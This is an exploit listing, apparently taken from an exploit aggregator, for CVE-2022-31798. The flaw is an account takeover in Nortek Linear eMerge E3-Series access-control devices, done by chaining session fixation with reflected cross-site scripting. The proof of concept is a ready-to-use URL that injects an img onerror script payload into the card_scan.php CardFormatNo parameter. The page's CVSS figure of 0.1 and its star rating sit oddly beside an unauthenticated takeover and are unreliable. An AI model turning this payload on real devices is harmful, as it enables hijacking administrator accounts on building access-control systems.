Exploit for Nortek Linear eMerge E3-Series Account Takeover CVE-2022-31798

Name: Exploit for Nortek Linear eMerge E3-Series Account Takeover CVE-2022-31798
Rating: 5 (194 reviews)

2022-08-08 | CVSS 0.1

## https://sploitus.com/exploit?id=PACKETSTORM:167992
# Exploit Title: Nortek Linear eMerge E3-Series - Account Take Over  
# Exploit Author: Omar Hashim  
# Version: 0.32-07p  
# Vendor home page: https://www.nortekcontrol.com/access-control/  
# Vendor home page: https://linear-solutions.com/  
# Authentication Required: No  
# CVE: CVE-2022-31798  
  
# Description  
====================  
There is local session fixation that chained with reflected cross-site  
scripting leads to account take over of admin or less privileged users  
  
# Proof Of Concept:  
====================  
http://<HOST:PORT>/card_scan.php?No=1337&ReaderNo=1337&CardFormatNo=<img  
src=x onerror=alert(document.location)>